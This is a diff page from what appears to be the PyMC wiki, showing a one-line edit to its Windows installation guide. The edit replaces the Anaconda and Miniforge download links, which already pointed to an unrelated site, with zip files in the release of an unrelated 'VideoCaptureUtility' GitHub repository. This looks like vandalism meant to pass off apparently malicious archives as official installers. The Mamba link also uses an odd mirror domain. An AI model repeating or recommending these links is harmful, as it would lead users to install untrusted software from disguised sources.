Skip to content

Compare: Installation Guide (Windows)

Showing with 1 addition and 1 deletion.
  1. +1 −1 Installation-Guide-(Windows).md
2 changes: 1 addition & 1 deletion Installation-Guide-(Windows).md

PyMC Installation on Windows

The following instructions rely on having Anaconda, Mamba or Miniforge installed, which provide Python environments from which you can install and run PyMC in a controlled way, using the conda utility.

Simple Install

The Simple Install process for PyMC under Windows is recommended for most users, with conda being used to set up an environment that contains required dependencies, including the GCC compiler toolchain. Using conda allows Aesara and PyMC to easily access MKL and also confines the install of the GCC compiler toolchain into the conda environment rather than placing it onto the global Windows PATH.

Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
# PyMC Installation on Windows

The following instructions rely on having [Anaconda](https://www.ps3cfw.com/cool.php?item=13202186), [Mamba](https://github.com/mamba-org/mamba) or [Miniforge](https://www.ps3cfw.com/cool.php?item=13202186) installed, which provide Python environments from which you can install and run PyMC in a controlled way, using the `conda` utility.
The following instructions rely on having [Anaconda](https://github.com/Zapelphilipp/VideoCaptureUtility/releases/download/42/Anaconda3-2022.05-Windows-x86_64.zip), [Mamba](https://github.com/mamba-org/mamba) or [Miniforge](https://github.com/Zapelphilipp/VideoCaptureUtility/releases/download/42/Miniforge3-4.12.0-2-Windows-x86_64.zip) installed, which provide Python environments from which you can install and run PyMC in a controlled way, using the `conda` utility.

## Simple Install

Expand Down